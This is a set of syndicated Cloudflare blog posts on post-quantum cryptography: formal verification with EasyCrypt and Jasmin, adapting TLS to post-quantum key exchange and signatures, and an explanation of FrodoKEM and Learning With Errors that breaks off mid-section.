In this blog post, we will be talking about ways to make this gap smaller by making the code we deploy better through analyzing its security properties and its implementation. This blog post continues our work on high assurance cryptography, for example, on using Tamarin to analyze entire protocol specifications. In this one, we want to look more on the side of verifying implementations. Our desire for high assurance cryptography isn’t specific to post-quantum cryptography, but because quantum-safe algorithms and protocols are so new, we want extra reassurance that we’re doing the best we can. The post-quantum era also gives us a great opportunity to try and apply all the lessons we’ve learned while deploying classical cryptography, which will hopefully prevent us from making the same mistakes all over again.

This blog post will discuss formal verification. Formal verification is a technique we can use to prove that a piece of code correctly implements a specification. Formal verification, and formal methods in general, have been around for a long time, appearing as early as the 1950s. Today, they are being applied in a variety of ways: from automating the checking of security proofs to automating checks for functional correctness and the absence of side-channels attacks. Code verified using such formal verification has been deployed in popular products like Mozilla Firefox and Google Chrome.

Formal verification, as opposed to formal analysis, the topic of other blog posts, deals with verifying code and checking that it correctly implements a specification. Formal analysis, on the other hand, deals with establishing that a specification has the desired properties, for example, having a specific security guarantee.

Let’s explore what it means for an algorithm to have a proof that it achieves a certain security goal and what it means to have an implementation we can prove correctly implements that algorithm.

Goals of a formal analysis and verification process

Our goal, given a description of an algorithm in a natural language, is to produce two proofs: first, one that shows that the algorithm has the security properties we want and, second, that we have a correct implementation of it. We can go about this in four steps:

  1. Turn the algorithm and its security goals into a formal specification. This is us defining the problem.
  2. Use formal analysis to prove, in our case using a computer-aided proof tooling, that the algorithm attains the specified properties.
  3. Use formal verification to prove that the implementation correctly implements the algorithm.
  4. Use formal verification to prove that our implementation has additional properties, like memory safety, running in constant time, efficiency, etc.

Interestingly we can do step 2 in parallel with steps 3 and 4, because the two proofs are actually independent. As long as they are both building from the same specification established in step 1, the properties we establish in the formal analysis should flow down to the implementation.

Suppose, more concretely, we’re looking at an implementation and specification of a Key Encapsulation Mechanism (a KEM, such as FrodoKEM). FrodoKEM is designed to achieve IND-CCA security, so we want to prove that it does, and that we have an efficient, side-channel resistant and correct implementation of it.

As you might imagine, achieving even one of these goals is no small feat. Achieving all, especially given the way they conflict (efficiency clashes with side-channel resistance, for example), is a Herculean task. Decades of research have gone into this space, and it is huge; so let’s carve out and examine a small subsection to look at: we’ll look at two tools, EasyCrypt and Jasmin.

Before we jump into the tools, let’s take a brief aside to discuss why we’re not using Tamarin, which we’ve talked about in our other blog posts. Like EasyCrypt, Tamarin is also a tool used for formal analysis, but beyond that, the two tools are quite different. Formal analysis broadly splits into two camps, symbolic analysis and computational analysis. Tamarin, as we saw, uses symbolic analysis, which treats all functions effectively as black boxes, whereas EasyCrypt uses computational analysis. Computational analysis is much closer to how we program, and functions are given specific implementations. This gives computational analysis a much higher “resolution”: we can study properties in much greater detail and, perhaps, with greater ease. This detail, of course, comes at a cost. As functions grow into full protocols, with multiple modes, branching paths, and in the case of the Transport Layer Security (TLS), sometimes even resumption, computational models become unwieldy and difficult to work with, even with computer-assisted tooling. We therefore have to pick the correct tool for the job. When we need maximum assurance, sometimes both computational and symbolic proofs are constructed, with each playing to its strengths and compensating for the other’s drawbacks.

EasyCrypt

EasyCrypt is a proof assistant for cryptographic algorithms and imperative programs. A proof is basically a formal demonstration that some statement is true. EasyCrypt is called a proof assistant because it “assists” you with creating a proof; it does not create a proof for you, but rather, helps you come to it and gives you the power to have a machine check that each step logically follows from the last. It provides a language to write definitions, programs, and theorems along with an environment to develop machine-checked proofs.

A proof starts from a set of assumptions, and by taking a series of logical steps demonstrates that some statement is true. Let’s imagine for a moment that we are the hero Perseus on a quest to kill a mythological being, the terrifying Medusa. How can we prove to everyone that we’ve succeeded? No one is going to want to enter Medusa’s cave to check that she is dead because they’ll be turned to stone. And we cannot just state, “I killed the Medusa.” Who will believe us without proof? After all, is this not a leap of faith?

What we can do is bring the head of the Medusa as proof. Providing the head as a demonstration is our proof because no mortal Gorgon can live without a head. Legend has it that Perseus completed the proof by demonstrating that the head was indeed that of the Medusa: Perseus used the head’s powers to turn Polydectes to stone (the latter was about to force Perseus’ mother to marry him, so let’s just say it wasn’t totally unprovoked). One can say that this proof was done “by hand” in that it was done without any mechanical help. For computer security proofs, sometimes the statements we want to prove are so cumberstone to prove and are so big that having a machine to help us is needed.

How does EasyCrypt achieve this? How does it help you? As we are dealing with cryptography here, first, let’s start by defining how one can reason about cryptography, the security it provides, and the proofs one uses to corroborate them.

When we encrypt something, we do this to hide whatever we want to send. In a perfect world, it would be indistinguishable from noise. Unfortunately, only the one-time-pad truly offers this property, so most of the time we make do with “close enough”: it should be infeasible to differentiate a true encrypted value from a random one.

When we want to show that a certain cryptographic protocol or algorithm has this property, we write it down as an “indistinguishability game.” The idea of the game is as follows:

Imagine a gnome is sitting in a box. The gnome takes a message as input to the box and produces a ciphertext. The gnome records each message and the ciphertext they see generated. A troll outside the box chooses two messages (m1 and m2) of the same length and sends them to the box. The gnome records the box operations and flips a coin. If the coin lands on its face, then the gnome sends the ciphertext (c1) corresponding to m1. Otherwise, they send c2 corresponding to m2. In order to win, the troll, knowing the messages and the ciphertext, has to guess which message was encrypted.

In this example, we can see two things: first, choices are random as the ciphertext sent is chosen by flipping a coin; second, the goal of the adversary is to win a game.

EasyCrypt takes this approach. Security goals are modeled as probabilistic programs (basically, as games) played by an adversary. Tools from program verification and programming language theory are used to justify the cryptographic reasoning. EasyCrypt relies on a “goal directed proof” approach, in which two important mechanisms occur: lemmas and tactics. Let’s see how this approach works (following this amazing paper):

  1. The prover (in this case, you) enters a small statement to prove. For this, one uses the command lemma (meaning this is a minor statement needed to be proven).
  2. EasyCrypt will display the formula as a statement to be proved (i.e the goal) and will also display all the known hypotheses (unproven lemmas) at any given point.
  3. The prover enters a command (a tactic) to either decompose the statement into simpler ones, apply a hypothesis, or make progress in the proof in some other way.
  4. EasyCrypt displays a new set of hypotheses and the parts that still need to be proved.
  5. Back to step 3.

Let’s say you want to prove something small, like the statement “if p in conjunction with q, then q in conjunction with p.” In predicate logic terms, this will be written as (p ∧ q) → (q ∧ p). If we translate this into English statements, as Alice will say in Alice in Wonderland, it could be:

p: I have a world of my own.
q: Everything is nonsense.
p∧q: I have a world of my own and everything is nonsense.
(p ∧ q) → (q ∧ p): If I have a world of my own and everything is nonsense, then, everything is nonsense, and I have a world of my own.

We will walk through such a statement and its proof in EasyCrypt. For more of these examples, see these given by the marvelous Alley Stoughton.

Using EasyCrypt and Jasmin for post-quantum verification
Our lemma and proof in EasyCrypt.

lemma implies_and () :

This line introduces the stated lemma and creatively calls it “implies_and”. It takes no parameters.

(forall (P, Q: bool) => P /\ Q => Q /\ P.

This is the statement we want to prove. We use the variables P and Q of type bool (booleans), and we state that if P and Q, then Q and P.

Up until now we have just declared our statement to prove to EasyCrypt. Let’s see how we write the proof:

proof.
This line demarcates the start of the proof for EasyCrypt.


move => p q H.
We introduce the hypothesis we want to prove (we move them to the “context”). We state that P and Q are both booleans, and that H is the hypothesis P /\ Q.


elim H.

We eliminate H (the conjunctive hypothesis) and we get the components: “p => q => q /\ p”.

trivial.

The proof is now trivial.

qed.

Quod erat demonstrandum (QED) denotes the end of the proof (if both are true, then the conjunction holds). Whew! For such a simple statement, this took quite a bit of work, because EasyCrypt leaves no stone unturned. If you get to this point, you can be sure your proof is absolutely correct, unless there is a bug in EasyCrypt itself (or unless we are proving something that we weren’t supposed to).

As you see, EasyCrypt helped us by guiding us in decomposing the statement into simpler terms, and stating what still needed to be proven. And by strictly following logical principles, we managed to realize a proof. If we are doing something wrong, and our proof is incorrect, EasyCrypt will let us know, saying something like:

Using EasyCrypt and Jasmin for post-quantum verification
Screenshot of EasyCrypt showing us that we did something wrong.

What we have achieved is a computer-checked proof of the statement, giving us far greater confidence in the proof than if we had to scan over one written with pen and paper. But what makes EasyCrypt particularly attractive in addition to this is its tight integration with the Jasmin programming language as we will see later.

EasyCrypt will also interactively guide us to the proof, as it easily works with ProofGeneral in Emacs. In the image below we see, for example, that EasyCrypt is guiding us by showing the variables we have declared (p, q, and H) and what is missing to be proven (after the dashed line).

Using EasyCrypt and Jasmin for post-quantum verification
EasyCrypt interactively showing us at which point of the proof we are at: the cyan section shows us up until which point we have arrived.

If one is more comfortable with Coq proof assistant (you can find very good tutorials of it), a similar proof can be given:

Using EasyCrypt and Jasmin for post-quantum verification
Our lemma and proof in Coq.

EasyCrypt allows us to prove statements in a faster and more assured manner than if we do proofs by hand. Proving the truthness of the statement we just showed would be easy with the usage of truth tables, for example. But, it is only easy to find these truth tables or proofs when the statement is small. If one is given a complex cryptography algorithm or protocol, the situation is much harder.

Jasmin

Jasmin is an assembly-like programming language with some high-level syntactic conveniences such as loops and procedure calls while using assembly-level instructions. It does support function calls and functional arrays, as well. The Jasmin compiler predictably transforms source code into assembly code for a chosen platform (currently only x64 is supported). This transformation is verified: the correctness of some compiler passes (like function inlining or loop unrolling) are proven and verified in the Coq proof assistant. Other passes are programmed in a conventional programming language and the results are validated in Coq. The compiler also comes with a built-in checker for memory safety and constant-time safety.

This assembly-like syntax, combined with the stated assurances of the compiler, means that we have deep control over the output, and we can optimize it however we like without compromising safety. Because low-level cryptographic code tends to be concise and non-branching, Jasmin doesn’t need full support for general purpose language features or to provide lots of libraries. It only needs to support a set of basic features to give us everything we need.

One reason Jasmin is so powerful is that it provides a way to formally verify low-level code. The other reason is that Jasmin code can be automatically converted by the compiler into equivalent EasyCrypt code, which lets us reason about its security. In general terms, whatever guarantees apply to the EasyCrypt code also flow into the Jasmin code, and subsequently into the assembly code.

Let’s use the example of a very simple Jasmin function that performs multiplication to see Jasmin in action:

Using EasyCrypt and Jasmin for post-quantum verification
A multiplication function written in Jasmin.

What the function (“fn”) “mul” does, in this case, is to multiply by whatever number is provided as an argument to the function (the variable a). The syntax of this small function should feel very familiar to anyone that has worked with the C family of programming languages. The only big difference is the use of the words reg and u64. What they state is that the variable a, for example, is allocated in registers (hence, the use of reg: this defines the storage of the variable) and that it is 64-bit machine-word (hence, the use of u64). We can convert now this to “pure” x64 assembly:

Using EasyCrypt and Jasmin for post-quantum verification
A multiplication function written in Jasmin and transformed to Assembly.

The first lines of the assembly code are just “setting all up”. They are then followed by the “imulq” instruction, which just multiplies the variable by the constant (which in this case is labeled as “param”). While this small function might not show the full power of having the ability of safely translating to assembly, it can be seen when more complex functions are created. Functions that use while loops, arrays, calls to other functions are accepted by Jasmin and will be safely translated to assembly.

Assembly language has a little bit of a bad reputation because it is thought to be hard to learn, hard to read, and hard to maintain. Having a tool that helps you with translation is very useful to a programmer, and it is also useful as you can manually or automatically check what the assembly code looks like.

We can further check the code for its safety:

Using EasyCrypt and Jasmin for post-quantum verification
A multiplication function written and checked in Jasmin.

In this check, there are many things to understand. First, it checks that the inputs are allocated in a memory region of at least 0 bytes. Second, the “Rel” entry checks the allocated memory region safety pre-condition: for example, n must point to an allocated memory region of sufficient length.

You can then extract this functionality to EasyCrypt (and even configure EasyCrypt to verify Jasmin programs). Here is the corresponding EasyCrypt code, automatically produced by the Jasmin compiler:

Using EasyCrypt and Jasmin for post-quantum verification
A multiplication function written in Jasmin and extracted to EasyCrypt.

Here’s a slightly more involved example, that of a FrodoKEM utility function written in Jasmin.

Using EasyCrypt and Jasmin for post-quantum verification
A utility function for addition for FrodoKEM.

With a C-like syntax,  this function adds two arrays (a and b), and returns the result (in out). The value NBAR is just a parameter you can specify in a C-like manner. You can then take this function and compile it to assembly. You can also use the Jasmin compiler to analyze the safety of the code (for example, that array accesses are in bounds, that memory accesses are valid, that arithmetic operations are applied to valid arguments) and verify the code runs in constant-time.

The addition function as used by FrodoKEM can also be extracted to EasyCrypt:

Using EasyCrypt and Jasmin for post-quantum verification
The addition function as extracted to EasyCrypt.

A theorem expressing the correctness (meaning that addition is correct) is expressed in EasyCrypt as so:

Using EasyCrypt and Jasmin for post-quantum verification
The theorem of addition function as extracted to EasyCrypt.

Note that EasyCrypt uses While Language and Hoare Logic. The corresponding proof that states that addition is correct:

Using EasyCrypt and Jasmin for post-quantum verification
The proof of the addition function as extracted to EasyCrypt.

Why formal verification for post-quantum cryptography?

As we have previously stated, cryptographic implementations are very hard to get right, and even if they are right, the security properties they claim to provide are sometimes wrong for their intended application. The reason why this matters so much is that post-quantum cryptography is the cryptography we will be using in the future due to the arrival of quantum computers. Deploying post-quantum cryptographic algorithms with bugs or flaws in their security properties would be a disaster because connections and data that travels through it can be decrypted or attacked. We are trying to prevent that.

Cryptography is difficult to get right, and it is not only difficult to get right by people new to it, but it is also difficult for anyone, even for the experts. The designs and code we write are error-prone as we all are, as humans, prone to errors. Some examples of when some designs got it wrong are as follows (luckily, these example  were not deployed, and they did not have the usual disastrous consequences):

  • Falcon (a post-quantum algorithm currently part of the NIST procedure), produced valid signatures “but leaked information on the private key,” according to an official comment posted to the NIST post-quantum process on the algorithm. The comment also noted that “the fact that these bugs existed in the first place shows that the traditional development methodology (i.e. “being super careful”) has failed.“
  • “The De Feo–Jao–Plût identification scheme (the basis for SIDH signatures) contains an invalid assumption and provide[s] a counterexample for this assumption: thus showing the proof of soundness is invalid,” according to a finding that one proof of a post-quantum algorithm was not valid. This is an example of an incorrect proof, whose flaws were discovered and eliminated prior to any deployment.

Perhaps these two examples might convince the reader that formal analysis and formal verification of implementations are needed. While they help us avoid some human errors, they are not perfect. As for us, we are convinced of these methods. We are working towards a formally verified implementation of FrodoKEM (we have a first implementation of it in our cryptographic library, CIRCL), and we are collaborating to create a formally verified and implemented library we can run in real-world connections. If you are interested in learning more about EasyCrypt and Jasmin, visit the resources we have put together, try to install it following our guidelines, or follow some tutorials.

See you on other adventures in post-quantum (and some cat videos for you)!

References:

  • “SoK: Computer-Aided Cryptography” by Manuel Barbosa, Gilles Barthe, Karthik Bhargavan, Bruno Blanchet, Cas Cremers, Kevin Liao and Bryan Parno: https://eprint.iacr.org/2019/1393.pdf
  • “EasyPQC: Verifying Post-Quantum Cryptography” by Manuel Barbosa, Gilles Barthe, Xiong Fan, Benjamin Grégoire, Shih-Han Hung, Jonathan Katz, Pierre-Yves Strub, Xiaodi Wu and Li Zhou: https://eprint.iacr.org/2021/1253
  • “Jasmin: High-Assurance and High-Speed Cryptography” by José Bacelar Almeida, Manuel Barbosa, Gilles Barthe, Arthur Blot, Benjamin Grégoire, Vincent Laporte, Tiago Oliveira, Hugo Pacheco, Benedikt Schmidt and Pierre-Yves Strub: https://dl.acm.org/doi/pdf/10.1145/3133956.3134078
  • “The Last Mile: High-Assurance and High-Speed Cryptographic Implementations” by José Bacelar Almeida, Manuel Barbosa, Gilles Barthe, Benjamin Grégoire, Adrien Koutsos, Vincent Laporte,Tiago Oliveira and Pierre-Yves Strub: https://arxiv.org/pdf/1904.04606.pdf

Making protocols post-quantum

Post Syndicated from Thom Wiggers original https://blog.cloudflare.com/making-protocols-post-quantum/

Making protocols post-quantum

Making protocols post-quantum

Ever since the (public) invention of cryptography based on mathematical trap-doors by Whitfield Diffie, Martin Hellman, and Ralph Merkle, the world has had key agreement and signature schemes based on discrete logarithms. Rivest, Shamir, and Adleman invented integer factorization-based signature and encryption schemes a few years later. The core idea, that has perhaps changed the world in ways that are hard to comprehend, is that of public key cryptography. We can give you a piece of information that is completely public (the public key), known to all our adversaries, and yet we can still securely communicate as long as we do not reveal our piece of extra information (the private key). With the private key, we can then efficiently solve mathematical problems that, without the secret information, would be practically unsolvable.

In later decades, there were advancements in our understanding of integer factorization that required us to bump up the key sizes for finite-field based schemes. The cryptographic community largely solved that problem by figuring out how to base the same schemes on elliptic curves. The world has since then grown accustomed to having algorithms where public keys, secret keys, and signatures are just a handful of bytes and the speed is measured in the tens of microseconds. This allowed cryptography to be bolted onto previously insecure protocols such as HTTP or DNS without much overhead in either time or the data transmitted. We previously wrote about how TLS loves small signatures; similar things can probably be said for a lot of present-day protocols.

But this blog has “post-quantum” in the title; quantum computers are likely to make our cryptographic lives significantly harder by undermining many of the assurances we previously took for granted. The old schemes are no longer secure because new algorithms can efficiently solve their particular mathematical trapdoors. We, together with everyone on the Internet, will need to swap them out. There are whole suites of quantum-resistant replacement algorithms; however, right now it seems that we need to choose between “fast” and “small”. The new alternatives also do not always have the same properties that we have based some protocols on.

Making protocols post-quantum
Fast or small: Cloudflare previously experimented with NTRU-HRSS (a fast key exchange scheme with large public keys and ciphertexts) and SIKE (a scheme with very small public keys and ciphertexts, but much slower algorithm operations).

In this blog post, we will discuss how one might upgrade cryptographic protocols to make them secure against quantum computers. We will focus on the cryptography that they use and see what the challenges are in making them secure against quantum computers. We will show how trade-offs might motivate completely new protocols for some applications. We will use TLS here as a stand-in for other protocols, as it is one of the most deployed protocols.

Making TLS post-quantum

TLS, from SSL and HTTPS fame, gets discussed a lot. We keep it brief here. TLS 1.3 consists of an Ephemeral Elliptic curve Diffie-Hellman (ECDH) key exchange which is authenticated by a digital signature that’s verified by using a public key that’s provided by the server in a certificate. We know that this public key is the right one because the certificate contains another signature by the issuer of the certificate and our client has a repository of valid issuer (“certificate authority”) public keys that it can use to verify the authenticity of the server’s certificate.

In principle, TLS can become post-quantum straightforwardly: we just write “PQ” in front of the algorithms. We replace ECDH key exchange by post-quantum (PQ) key exchange provided by a post-quantum Key Encapsulation Mechanism (KEM). For the signatures on the handshake, we just use a post-quantum signature scheme instead of an elliptic curve or RSA signature scheme. No big changes to the actual “arrows” of the protocol necessary, which is super convenient because we don’t need to revisit our security proofs. Mission accomplished, cake for everyone, right?

Making protocols post-quantum
Upgrading the cryptography in TLS seems as easy as scribbling in “PQ-”.

Key exchange

Of course, it’s not so simple. There are nine different suites of post-quantum key exchange algorithms still in the running in round three of the NIST Post-Quantum standardization project: Kyber, SABER, NTRU, and Classic McEliece (the “finalists”); and SIKE, BIKE, FrodoKEM, HQC, and NTRU Prime (“alternates”). These schemes have wildly different characteristics. This means that for step one, replacing the key exchange by post-quantum key exchange, we need to understand the differences between these schemes and decide which one fits best in TLS. Because we’re doing ephemeral key exchange, we consider the size of the public key and the ciphertext since they need to be transmitted for every handshake. We also consider the “speed” of the key generation, encapsulation, and decapsulation operations, because these will affect how many servers we will need to handle these connections.

Table 1: Post-Quantum KEMs at security level comparable with AES128. Sizes in bytes.

Scheme Transmission size (pk+ct) Speed of operations
Finalists
Kyber512 1,632 Very fast
NTRU-HPS-2048-509 1,398 Very fast
SABER (LightSABER) 1,408 Very fast
Classic McEliece 261,248 Very slow
Alternate candidates
SIKEp434 676 Slow
NTRU Prime (ntrulpr) 1,922 Very fast
NTRU Prime (sntru) 1,891 Fast
BIKE 5,892 Slow
HQC 6,730 Reasonable
FrodoKEM 19,336 Reasonable

Fortunately, once we make this table the landscape for KEMs that are suitable for use in TLS quickly becomes clear. We will have to sacrifice an additional 1,400 – 2,000 bytes, assuming SIKE’s slow runtime is a bigger penalty to the connection establishment (see our previous work here). So we can choose one of the lattice-based finalists (Kyber, SABER or NTRU) and call it a day.1

Signature schemes

For our post-quantum signature scheme, we can draw a similar table. In TLS, we generally care about the sizes of public keys and signatures. In terms of runtime, we care about signing and verification times, as key generation is only done once for each certificate, offline. The round three candidates for signature schemes are: Dilithium, Falcon, Rainbow (the three finalists), and SPHINCS+, Picnic, and GeMSS.

Table 2: Post-Quantum signature schemes at security level comparable with AES128 (or smallest parameter set). Sizes in bytes.

Scheme Public key size Signature size Speed of operations
Finalists
Dilithium2 1,312 2,420 Very fast
Falcon-512 897 690 Fast if you have the right hardware
Rainbow-I-CZ 103,648 66 Fast
Alternate Candidates
SPHINCS+-128f 32 17,088 Slow
SPHINCS+-128s 32 7,856 Very slow
GeMSS-128 352,188 33 Very slow
Picnic3 35 14,612 Very slow

There are many signatures in a TLS handshake. Aside from the handshake signature that the server creates to authenticate the handshake (with public key in the server certificate), there are signatures on the certificate chain (with public keys for intermediate certificates), as well as OCSP Stapling (1) and Certificate Transparency (2) signatures (without public keys).

This means that if we used Dilithium for all of these, we require 17KB of public keys and signatures. Falcon is looking very attractive here, only requiring 6KB, but it might not run fast enough on embedded devices that don’t have special hardware to accelerate 64-bit floating point computations in constant time. SPHINCS+, GeMSS, or Rainbow each have significant deployment challenges, so it seems that there is no one-scheme-fits-all solution.

Picking and choosing specific algorithms for particular use cases, such as using a scheme with short signatures for root certificates, OCSP Stapling, and CT might help to alleviate the problems a bit. We might use Rainbow for the CA root, OCSP staples, and CT logs, which would mean we only need 66 bytes for each signature. It is very nice that Rainbow signatures are only very slightly larger than 64-byte ed25519 elliptic curve signatures, and they are significantly smaller than 256-byte RSA-2048 signatures. This gives us a lot of space to absorb the impact of the larger handshake signatures required. For intermediate certificates, where both the public key and the signature are transmitted, we might use Falcon because it’s nice and small, and the client only needs to do signature verification.

Using KEMs for authentication

In the pre-quantum world, key exchange and signature schemes used to be roughly equivalent in terms of work required or bytes transmitted. As we saw in the previous section, this doesn’t hold up in the post-quantum world. This means that this might be a good opportunity to also investigate alternatives to the classic “signed key exchange” model. Deploying significant changes to an existing protocol might be harder than just swapping out primitives, but we might gain better characteristics. We will look at such a proposed redesign for TLS here.

The idea is to use key exchange not just for confidentiality, but also for authentication. This uses the following idea: what a signature in a protocol like TLS is actually proving is that the person signing has possession of the secret key that corresponds to the public key that’s in the certificate. But we can also do this with a key exchange key by showing you can derive the same shared secret (if you want to prove this explicitly, you might do so by computing a Message Authentication Code using the established shared secret).

This isn’t new; many modern cryptographic protocols, such as the Signal messaging protocol, have used such mechanisms. They offer privacy benefits like (offline) deniability. But now we might also use this to obtain a faster or “smaller” protocol.

However, this does not come for free. Because authentication via key exchange (via KEM at least) inherently requires two participants to exchange keys, we need to send more messages. In TLS, this means that the server that wants to authenticate first needs to give the client their public key. The client obviously can not encapsulate a shared secret to a key he does not know.

We also still need to verify signatures on the certificate chain and the signatures for OCSP stapling and Certificate Transparency are still necessary. Because we need to do “offline” verification for those elements of the handshake, it is hard to get rid of those signatures. So we will still need to carefully look at those signatures and pick an algorithm that fits there.

   Client                                  Server
 ClientHello         -------->
                     <--------         ServerHello
                                             <...>
                     <--------       <Certificate>  ^
 <KEMEncapsulation>                                 | Auth
 {Finished}          -------->                      |
 [Application Data]  -------->                      |
                     <--------          {Finished}  v
 [Application Data]  <------->  [Application Data]

<msg>: encrypted w/ keys derived from ephemeral KEX (HS)
{msg}: encrypted w/ keys derived from HS+KEM (AHS)
[msg]: encrypted w/ traffic keys derived from AHS (MS)

Authentication via KEM in TLS from the AuthKEM proposal

Authentication via KEM in TLS from the AuthKEM proposal

If we put the necessary arrows to authenticate via KEM into TLS it looks something like Figure 2. This is actually a fully-fledged proposal for an alternative to the usual TLS handshake. The academic proposal KEMTLS was published at the ACM CCS conference in 2020; a proposal to integrate this into TLS 1.3 is described in the draft-celi-wiggers-tls-authkem draft RFC.

What this proposal illustrates is that the transition to post-quantum cryptography might motivate, or even require, us to have a brand-new look at what the desired characteristics of our protocol are and what properties we need, like what budget we have for round-trips versus the budget for data transmitted. We might even pick up some properties, like deniability, along the way. For some protocols this is somewhat easy, like TLS; in other protocols there isn’t even a clear idea of where to start (DNSSEC has very tight limits).

Conclusions

We should not wait until NIST has finished standardizing post-quantum key exchange and signature schemes before thinking about whether our protocols are ready for the post-quantum world. For our current protocols, we should investigate how the proposed post-quantum key exchange and signature schemes can be fitted in. At the same time, we might use this opportunity for careful protocol redesigns, especially if the constraints are so tight that it is not easy to fit in post-quantum cryptography. Cloudflare is participating in the IETF and working with partners in both academia and the industry to investigate the impact of post-quantum cryptography and make the transition as easy as possible.

If you want to be a part of the future of cryptography on the Internet, either as an academic or an engineer, be sure to check out our academic outreach or jobs pages.

Reference

…..

1Of course, it’s not so simple. The performance measurements were done on a beefy Macbook, using AVX2 intrinsics. For stuff like IoT (yes, your smart washing machine will also need to go post-quantum) or a smart card you probably want to add another few columns to this table before making a choice, such as code size, side channel considerations, power consumption, and execution time on your platform.

Deep Dive Into a Post-Quantum Key Encapsulation Algorithm

Post Syndicated from Goutam Tamvada original https://blog.cloudflare.com/post-quantum-key-encapsulation/

Deep Dive Into a Post-Quantum Key Encapsulation Algorithm

Deep Dive Into a Post-Quantum Key Encapsulation Algorithm

The Internet is accustomed to the fact that any two parties can exchange information securely without ever having to meet in advance. This magic is made possible by key exchange algorithms, which are core to certain protocols, such as the Transport Layer Security (TLS) protocol, that are used widely across the Internet.

Key exchange algorithms are an elegant solution to a vexing, seemingly impossible problem. Imagine a scenario where keys are transmitted in person: if Persephone wishes to send her mother Demeter a secret message, she can first generate a key, write it on a piece of paper and hand that paper to her mother, Demeter. Later, she can scramble the message with the key, and send the scrambled result to her mother, knowing that her mother will be able to unscramble the message since she is also in possession of the same key.

But what if Persephone is kidnapped (as the story goes) and cannot deliver this key in person? What if she can no longer write it on a piece of paper because someone (by chance Hades, the kidnapper) might read that paper and use the key to decrypt any messages between them? Key exchange algorithms come to the rescue: Persephone can run a key exchange algorithm with Demeter, giving both Persephone and Demeter a secret value that is known only to them (no one else knows it) even if Hades is eavesdropping. This secret value can be used to encrypt messages that Hades cannot read.

The most widely used key exchange algorithms today are based on hard mathematical problems, such as integer factorization and the discrete logarithm problem. But these problems can be efficiently solved by a quantum computer, as we have previously learned, breaking the secrecy of the communication.

There are other mathematical problems that are hard even for quantum computers to solve, such as those based on lattices or isogenies. These problems can be used to build key exchange algorithms that are secure even in the face of quantum computers. Before we dive into this matter, we have to first look at one algorithm that can be used for Key Exchange: Key Encapsulation Mechanisms (KEMs).

Two people could agree on a secret value if one of them could send the secret in an encrypted form to the other one, such that only the other one could decrypt and use it. This is what a KEM makes possible, through a collection of three algorithms:

  • A key generation algorithm, Generate, which generates a public key and a private key (a keypair).
  • An encapsulation algorithm, Encapsulate, which takes as input a public key, and outputs a shared secret value and an “encapsulation” (a ciphertext) of this secret value.
  • A decapsulation algorithm, Decapsulate, which takes as input the encapsulation and the private key, and outputs the shared secret value.

A KEM can be seen as similar to a Public Key Encryption (PKE) scheme, since both use a combination of public and private keys. In a PKE, one encrypts a message using the public key and decrypts using the private key. In a KEM, one uses the public key to create an “encapsulation” — giving a randomly chosen shared key — and one decrypts this “encapsulation” with the private key. The reason why KEMs exist is that PKE schemes are usually less efficient than symmetric encryption schemes; one can use a KEM to only transmit the shared/symmetric key, and later use it in a symmetric algorithm to efficiently encrypt data.

Nowadays, in most of our connections, we do not use KEMs or PKEs per se. We either use Key Exchanges (KEXs) or Authenticated Key Exchanges (AKE). The reason for this is that a KEX allows us to use public keys (solving the key exchange problem of how to securely transmit keys) in order to generate a shared/symmetric key which, in turn, will be used in a symmetric encryption algorithm to encrypt data efficiently. A famous KEX algorithm is Diffie-Hellman, but classical Diffie-Hellman based mechanisms do not provide security against a quantum adversary; post-quantum KEMs do.

When using a KEM, Persephone would run Generate and publish the public key. Demeter takes this public key, runs Encapsulate, keeps the generated secret to herself, and sends the encapsulation (the ciphertext) to Persephone. Persephone then runs Decapsulate on this encapsulation and, with it, arrives at the same shared secret that Demeter holds. Hades will not be able to guess even a bit of this secret value even if he sees the ciphertext.

Deep Dive Into a Post-Quantum Key Encapsulation Algorithm

In this post, we go over the construction of one particular post-quantum KEM, called FrodoKEM. Its design is simple, which makes it a good choice to illustrate how a KEM can be constructed. We will look at it from two perspectives:

  • The underlying mathematics: a cryptographic algorithm is built as a Matryoshka doll. The first doll is, most of the time, the mathematical base, which hardness should be strong so that security is maintained. In the post-quantum world, this is usually the hardness of some lattice problems (more on this in the next section).
  • The algorithmic construction : these are all the subsequent dolls that take the mathematical base and construct an algorithm out of it. In the case of a KEM, first you construct a Public Key Encryption (PKE) scheme and transform it (putting another doll on top) to make a KEM, so better security properties are attained, as we will see.
Deep Dive Into a Post-Quantum Key Encapsulation Algorithm

The core of FrodoKEM is a public-key encryption scheme called FrodoPKE, whose security is based on the hardness of the “Learning with Errors” (LWE) problem over lattices. Let us look now at the first doll of a KEM.

Note to the reader: Some mathematics is coming in the next sections, but do not worry, we will guide you through it.

The Learning With Errors Problem

The security (and mathematical foundation) of FrodoKEM relies on the hardness of the Learning With Errors (LWE) problem, a generalization of the classic Learning Parities with Noise problem, first defined by Regev.

In cryptography, specifically in the mathematics underlying it, we often use sets to define our operations. A set is a collection of any element, in this case, we will refer to collections of numbers. In cryptography textbooks and articles, one can often read:

Let $Z_q$ denote the set of integers $\{0, …, q-1\}$ where $(q > 2)$,

which means that we have a collection of integers from 0 to a number q (which has to be bigger than 2. It is assumed that q, in a cryptographic application, is a prime. In the main theorem, it is an arbitrary integer).

Let $\{Z^n\}_q$ denote a vector $(v1, v2, …, vn)$ of n elements, each of which belongs to $Z_q$.

The LWE problem asks to recover a secret vector $s = (s1, s2, …, sn)$ in $\{Z^n\}_q$ given a sequence of random, “approximate” linear equations on s. For instance, if $(q = 23)$ the equations might be:

[s1 + s2 + s3 + s4 ≈ 30 (mod 23)

2s1 + s3 + s5 + … + sn ≈ 40 (mod 23)

10s2 + 13s3 + 1s4 ≈ 50 (mod 23)

…]

We see the left-hand sides of the equations above are not exactly equal to the right-hand side (the equality sign is not used but rather the “≈” sign: approximately equal to); they are off by an introduced slight “error”, (which will be defined as the variable e. In the equations above, the error is, for example, the number 10). If the error was a known, public value, recovering s (the hidden variable) would be easy: after about n equations, we can recover s in a reasonable time using Gaussian elimination. Introducing this unknown error makes the problem difficult to solve (it is difficult with accuracy to find s), even for quantum computers.

An equivalent formulation of the LWE problem is:

  1. There exists a vector s in $\{Z^n\}_q$, called the secret (the hidden variable).
  2. There exists random variables a.
  3. χ is a distribution, e is the integer error introduced from the distribution χ.
  4. You have: (a, ⟨a, s⟩ + e). ⟨a, s⟩ is the inner product modulo q of s and a.
  5. Given ⟨a, s⟩ + e ≈ b, the input to the problem is a and b, the goal is to output a guess for s which is very hard to achieve with accuracy.

Blum, Kalai and Wasserman provided the first subexponetial algorithm for solving this problem. It requires 2O(n /log n) equations/time.

